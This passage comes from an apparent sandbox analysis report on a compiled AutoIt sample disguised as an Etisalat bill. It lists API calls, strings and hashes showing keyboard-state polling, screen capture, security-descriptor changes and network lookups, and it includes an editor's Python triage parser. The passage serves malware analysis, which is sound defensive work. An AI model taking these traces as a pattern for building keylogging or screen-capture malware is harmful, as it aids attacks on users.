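    print(summarize_reparse_sequence(parse_api_lines(SAMPLE_APIS)))
```

                                       The same parser works on any 'APIs' block in the report; only the constant tables need extending for other call families (for example the TTM_* tooltip messages in the tooltips_class32 block above).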
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BEC4EC
                                      • GetFocus.USER32 ref: 00BEC4FC
                                      • GetDlgCtrlID.USER32(00000000), ref: 00BEC507
                                      • _memset.LIBCMT ref: 00BEC632
                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BEC65D
                                      • GetMenuItemCount.USER32(?), ref: 00BEC67D
                                      • GetMenuItemID.USER32(?,00000000), ref: 00BEC690
                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BEC6C4
                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BEC70C
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BEC744
                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BEC779
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                      • String ID: 0
                                      • API String ID: 1296962147-4108050209
                                      • Opcode ID: 589f11a8e865db7b5c5ca39848b57529ac6d0c22f2be29d496869a4f0379834f
                                      • Instruction ID: 12f01c50b4d87ef5ed527473cd07db79228a5b17ad1304b1051286aacd7dc428
                                      • Opcode Fuzzy Hash: 589f11a8e865db7b5c5ca39848b57529ac6d0c22f2be29d496869a4f0379834f
                                      • Instruction Fuzzy Hash: 978180711083819FDB10DF25D885A6BBBE4FB98314F1045ADF99597291DB30DD06CFA2
                                      APIs
                                        • Part of subcall function 00BB874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BB8766
                                        • Part of subcall function 00BB874A: GetLastError.KERNEL32(?,00BB822A,?,?,?), ref: 00BB8770
                                        • Part of subcall function 00BB874A: GetProcessHeap.KERNEL32(00000008,?,?,00BB822A,?,?,?), ref: 00BB877F
                                        • Part of subcall function 00BB874A: HeapAlloc.KERNEL32(00000000,?,00BB822A,?,?,?), ref: 00BB8786
                                        • Part of subcall function 00BB874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BB879D
                                        • Part of subcall function 00BB87E7: GetProcessHeap.KERNEL32(00000008,00BB8240,00000000,00000000,?,00BB8240,?), ref: 00BB87F3
                                        • Part of subcall function 00BB87E7: HeapAlloc.KERNEL32(00000000,?,00BB8240,?), ref: 00BB87FA
                                        • Part of subcall function 00BB87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00BB8240,?), ref: 00BB880B
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BB8458
                                      • _memset.LIBCMT ref: 00BB846D
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BB848C
                                      • GetLengthSid.ADVAPI32(?), ref: 00BB849D
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00BB84DA
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BB84F6
                                      • GetLengthSid.ADVAPI32(?), ref: 00BB8513
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00BB8522
                                      • HeapAlloc.KERNEL32(00000000), ref: 00BB8529
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BB854A
                                      • CopySid.ADVAPI32(00000000), ref: 00BB8551
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BB8582
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BB85A8
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BB85BC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: 925b5eb1fcbf81df4a4fc777e3774cc2a5986e75b6bf8067829f0db1960d5ebb
                                      • Instruction ID: 4031cbc68191739d8c9782e92ac87255cbbb00ebf9eac12c579404d3d5bb0c5f
                                      • Opcode Fuzzy Hash: 925b5eb1fcbf81df4a4fc777e3774cc2a5986e75b6bf8067829f0db1960d5ebb
                                      • Instruction Fuzzy Hash: 81612B7190020AAFDF10DF95DC85AFEBBB9FF04314F1481A9E915AB291DBB19A05CF60
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00BD76A2
                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BD76AE
                                      • CreateCompatibleDC.GDI32(?), ref: 00BD76BA
                                      • SelectObject.GDI32(00000000,?), ref: 00BD76C7
                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BD771B
                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00BD7757
                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BD777B
                                      • SelectObject.GDI32(00000006,?), ref: 00BD7783
                                      • DeleteObject.GDI32(?), ref: 00BD778C
                                      • DeleteDC.GDI32(00000006), ref: 00BD7793
                                      • ReleaseDC.USER32(00000000,?), ref: 00BD779E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                      • String ID: (
                                      • API String ID: 2598888154-3887548279
                                      • Opcode ID: 8e52c40fef24fd277c642c53c0958df3dca0296fcdf5a049f1875a488af01318
                                      • Instruction ID: 3c531bc8907076a2c1eff33d4cbfafd90c472984e93557fdd2b71a9abe451ba2
                                      • Opcode Fuzzy Hash: 8e52c40fef24fd277c642c53c0958df3dca0296fcdf5a049f1875a488af01318
                                      • Instruction Fuzzy Hash: 93513975904249EFCB15CFA8CC85EAEBBF9EF48710F14846AF94997311EA31A940CB60
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,00BEFB78), ref: 00BCA0FC
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00BCA11E
                                      • __swprintf.LIBCMT ref: 00BCA177
                                      • __swprintf.LIBCMT ref: 00BCA190
                                      • _wprintf.LIBCMT ref: 00BCA246
                                      • _wprintf.LIBCMT ref: 00BCA264
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 311963372-2391861430
                                      • Opcode ID: 9d68a6d5da020454f5d4270167ded5ae6a69241189faf5bada349df4895885ec
                                      • Instruction ID: 139a60ce65789db07810ff63d74037325e52375e3e61ea08ebcfa63bea686946
                                      • Opcode Fuzzy Hash: 9d68a6d5da020454f5d4270167ded5ae6a69241189faf5bada349df4895885ec
                                      • Instruction Fuzzy Hash: 8B515C72940219AACF25EBE0CD86EEEB7B9EF04304F1001E5B515720A2EB356F59DB61
                                      APIs
                                        • Part of subcall function 00B80B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B66C6C,?,00008000), ref: 00B80BB7
                                        • Part of subcall function 00B648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B648A1,?,?,00B637C0,?), ref: 00B648CE
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B66D0D
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00B66E5A
                                        • Part of subcall function 00B659CD: _wcscpy.LIBCMT ref: 00B65A05
                                        • Part of subcall function 00B8387D: _iswctype.LIBCMT ref: 00B83885
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                      • API String ID: 537147316-1018226102
                                      • Opcode ID: 914fa8098c8682eb35270f85252caba47cf9ac5abf82f30eee88babacfd9434f
                                      • Instruction ID: 6b09f259c9c39b98df420463993b0dbbbc15ed3b3089c85ff2023735a9bbc442
                                      • Opcode Fuzzy Hash: 914fa8098c8682eb35270f85252caba47cf9ac5abf82f30eee88babacfd9434f
                                      • Instruction Fuzzy Hash: 6F02CF311083419FCB24EF24C891AAFBBE5FF99314F0409ADF496972A2DB35D949CB42
                                      APIs
                                      • _memset.LIBCMT ref: 00B645F9
                                      • GetMenuItemCount.USER32(00C26890), ref: 00B9D7CD
                                      • GetMenuItemCount.USER32(00C26890), ref: 00B9D87D
                                      • GetCursorPos.USER32(?), ref: 00B9D8C1
                                      • SetForegroundWindow.USER32(00000000), ref: 00B9D8CA
                                      • TrackPopupMenuEx.USER32(00C26890,00000000,?,00000000,00000000,00000000), ref: 00B9D8DD
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B9D8E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                      • String ID:
                                      • API String ID: 2751501086-0
                                      • Opcode ID: 9b749c0c84f2825768e0748a5da3b2d1a87c4cdf0d44e294bd9e1312e48c9820
                                      • Instruction ID: c696c3d8acf8fe0bf9e9756a4d880b7e4a4d082bf3e7b4025db75e2b19d79270
                                      • Opcode Fuzzy Hash: 9b749c0c84f2825768e0748a5da3b2d1a87c4cdf0d44e294bd9e1312e48c9820
                                      • Instruction Fuzzy Hash: F671E570600246BEEF219F65DC85FAABFE4FF05364F2002A6F515AA1E1CBB55C10DB90
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BE0038,?,?), ref: 00BE10BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 3964851224-909552448
                                      • Opcode ID: e6e40d79fc6693192478cf81ea1b13f08ad2637715ad2cd4b34a6cd6901ceea0
                                      • Instruction ID: 94ad8dc5992a70251e92c6a634e745e3ba8462ae94978fdb7bb604c1acc18d73
                                      • Opcode Fuzzy Hash: e6e40d79fc6693192478cf81ea1b13f08ad2637715ad2cd4b34a6cd6901ceea0
                                      • Instruction Fuzzy Hash: 82415C7025028A9BCF10FF95DC91AEE37A5EF16340F2048E4FD915B291DB30AD5ADB51
                                      APIs
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                        • Part of subcall function 00B67A84: _memmove.LIBCMT ref: 00B67B0D
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BC55D2
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BC55E8
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BC55F9
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BC560B
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BC561C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: SendString$_memmove
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 2279737902-1007645807
                                      • Opcode ID: 2153f9353c5ba2b7ade43e50fb3763c4ecd3e12fdcd0154255036c41ebbb0f73
                                      • Instruction ID: edf6f10bcf0679271ff72f9e6716ec76baad010b23a595691263a06b6d22cd54
                                      • Opcode Fuzzy Hash: 2153f9353c5ba2b7ade43e50fb3763c4ecd3e12fdcd0154255036c41ebbb0f73
                                      • Instruction Fuzzy Hash: 7511982099115979D720B6A1CC89EFFBBBCEF96B04F8004B9B411A20E2DE645D85C5A1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 208665112-3771769585
                                      • Opcode ID: 832cd1ccf079672f30d4f71821853350099c5bdc39c5d07f77d6f0938153ba96
                                      • Instruction ID: 85b59eb752368aaeefba02391852c3abc338201ccd58a8144a89b3a92703205f
                                      • Opcode Fuzzy Hash: 832cd1ccf079672f30d4f71821853350099c5bdc39c5d07f77d6f0938153ba96
                                      • Instruction Fuzzy Hash: 59119031904125AFCB24AB649C4AFEB77ECDF41710F0401FAF545960A1EFB19A81D761
                                      APIs
                                      • timeGetTime.WINMM ref: 00BC521C
                                        • Part of subcall function 00B80719: timeGetTime.WINMM(?,75A8B400,00B70FF9), ref: 00B8071D
                                      • Sleep.KERNEL32(0000000A), ref: 00BC5248
                                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00BC526C
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00BC528E
                                      • SetActiveWindow.USER32 ref: 00BC52AD
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BC52BB
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00BC52DA
                                      • Sleep.KERNEL32(000000FA), ref: 00BC52E5
                                      • IsWindow.USER32 ref: 00BC52F1
                                      • EndDialog.USER32(00000000), ref: 00BC5302
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: 4048861ed7a7606e389f66d7d6f688bf79efc3a6a4709be2f471911427b0ab9d
                                      • Instruction ID: ba8f3a11fce41048e53d89bcfc436d407a5f300860a86da54852abfdd081b859
                                      • Opcode Fuzzy Hash: 4048861ed7a7606e389f66d7d6f688bf79efc3a6a4709be2f471911427b0ab9d
                                      • Instruction Fuzzy Hash: 67218070114786AFE7205B34ECC8F397BE9EB95386B0005B8F5029A5B1CF61AD81C731
                                      APIs
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • CoInitialize.OLE32(00000000), ref: 00BCD855
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BCD8E8
                                      • SHGetDesktopFolder.SHELL32(?), ref: 00BCD8FC
                                      • CoCreateInstance.OLE32(00BF2D7C,00000000,00000001,00C1A89C,?), ref: 00BCD948
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BCD9B7
                                      • CoTaskMemFree.OLE32(?,?), ref: 00BCDA0F
                                      • _memset.LIBCMT ref: 00BCDA4C
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00BCDA88
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BCDAAB
                                      • CoTaskMemFree.OLE32(00000000), ref: 00BCDAB2
                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00BCDAE9
                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00BCDAEB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                      • String ID:
                                      • API String ID: 1246142700-0
                                      • Opcode ID: 04cdfdb3e2d88f86375cf0404b749dc46f90bdbe295d003aa293dadd33737aea
                                      • Instruction ID: 37a544835bb0e928f0f1ae8dbba01b66910755dc79e9adf1030712896bb5370c
                                      • Opcode Fuzzy Hash: 04cdfdb3e2d88f86375cf0404b749dc46f90bdbe295d003aa293dadd33737aea
                                      • Instruction Fuzzy Hash: CBB1DC75A00109AFDB14DFA5C889EAEBBF9FF48314B1484A9F509EB261DB30ED45CB50
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00BC05A7
                                      • SetKeyboardState.USER32(?), ref: 00BC0612
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00BC0632
                                      • GetKeyState.USER32(000000A0), ref: 00BC0649
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00BC0678
                                      • GetKeyState.USER32(000000A1), ref: 00BC0689
                                      • GetAsyncKeyState.USER32(00000011), ref: 00BC06B5
                                      • GetKeyState.USER32(00000011), ref: 00BC06C3
                                      • GetAsyncKeyState.USER32(00000012), ref: 00BC06EC
                                      • GetKeyState.USER32(00000012), ref: 00BC06FA
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00BC0723
                                      • GetKeyState.USER32(0000005B), ref: 00BC0731
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: dcc03805d6c4ce6e55c2e2ce00dfe2a4bac0be8d9bf562d6f1af2a35d8a62f19
                                      • Instruction ID: 9071ce62d8e4964ddcbb842fa13faf9ae089df1d6c3fcee9555987ff825ce31f
                                      • Opcode Fuzzy Hash: dcc03805d6c4ce6e55c2e2ce00dfe2a4bac0be8d9bf562d6f1af2a35d8a62f19
                                      • Instruction Fuzzy Hash: AE51C920A187885AFB35FBA48455FEABFF4DF12380F0845DE95C25B1C2DA649B4CCB61
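Worked example added by the editor (not Joe Sandbox code and not part of this report): a Python parser for the per-function "APIs" blocks in this dump format, plus a heuristic capability tagger run over a sample constructed from three entries on this page (the keyboard-state function above, the GetDriveTypeW function and the IcmpSendEcho function, abridged). The capability labels and rules are the editor's heuristics, not sandbox signatures. One caveat for the function above: the report classifies the binary as a compiled AutoIt script, and polling the LSHIFT/RSHIFT/CONTROL/MENU/LWIN modifier keys (0xA0, 0xA1, 0x11, 0x12, 0x5B) is consistent with the AutoIt runtime's own keyboard handling rather than with payload logic, so a hit here should be checked against the runtime before it is reported as keylogging.

```python
"""Triage helper for the per-function 'APIs' blocks of a Joe Sandbox execution-graph
dump (the plain-text format shown on this page). Added example, not Joe Sandbox code;
the capability rules below are the editor's heuristics, not sandbox signatures."""
import re
from typing import Dict, List

# Constructed sample input: three function entries copied in the report's own format
# (the keyboard-state, drive-type and ICMP functions from this page, abridged).
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 00BC05A7
• SetKeyboardState.USER32(?), ref: 00BC0612
• GetAsyncKeyState.USER32(000000A0), ref: 00BC0632
• GetKeyState.USER32(000000A0), ref: 00BC0649
• GetAsyncKeyState.USER32(00000011), ref: 00BC06B5
• GetAsyncKeyState.USER32(0000005B), ref: 00BC0723
Memory Dump Source
APIs
• CharLowerBuffW.USER32(?,?,00BEF910), ref: 00BCAB76
• GetDriveTypeW.KERNEL32(00000061,00C1A620,00000061), ref: 00BCAC40
• _wcscpy.LIBCMT ref: 00BCAC6A
Strings
Memory Dump Source
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00BD5AA6
• inet_addr.WSOCK32(?,?,?), ref: 00BD5AEB
• gethostbyname.WSOCK32(?), ref: 00BD5AF7
• IcmpCreateFile.IPHLPAPI ref: 00BD5B05
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BD5B75
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BD5C00
• WSACleanup.WSOCK32 ref: 00BD5C06
Memory Dump Source
"""

# One API line: optional "Part of subcall function XXXX:" prefix, Name.MODULE,
# optional "(args)", then "ref: ADDR". Decorated CRT names such as
# __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z are covered by the name class.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w$@?]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Virtual-key codes seen as the first argument of GetKeyState/GetAsyncKeyState.
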